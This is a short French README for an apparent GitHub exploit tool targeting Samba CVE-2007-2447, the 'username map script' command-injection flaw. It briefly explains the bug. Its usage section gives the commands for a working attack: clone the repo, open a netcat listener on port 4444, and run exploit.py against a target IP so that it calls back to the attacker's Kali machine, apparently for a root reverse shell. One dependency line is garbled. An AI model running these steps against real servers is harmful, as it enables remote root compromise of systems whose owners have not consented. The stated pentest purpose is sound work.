
Samba CVE-2007-2447 Exploit
Ce dépôt contient un script Python conçu pour automatiser l'exploitation de la vulnérabilité CVE-2007-2447 sur les serveurs Samba (versions 3.0.20 à 3.0.25rc3). Cet outil a été développé à des fins exclusivement éducatives et pour des tests de pénétration autorisés.
La vulnérabilité « Username Map Script » survient en raison du manque d'assainissement de l'entrée des noms d'utilisateur lorsque l'option username map script est activée dans la configuration de Samba. En envoyant un nom d'utilisateur contenant des métacaractères de shell (comme des backticks ` ou des sous-shells $()), le serveur exécute ces commandes avec les privilèges du service (souvent root).
smbclient installé).smbclient (doit être disponible dans le PATH du système).git clone [https://github.com/Daviddoctor/Samba-CVE-2007-2447-Exploit-Username-Map-Script-.git]
cd samba-exploit-cve-2007-2447
chmod +x exploit.py
nc -lvnp 4444
./exploit.py <IP_OBJETIVO> <TU_IP_KALI> -p 4444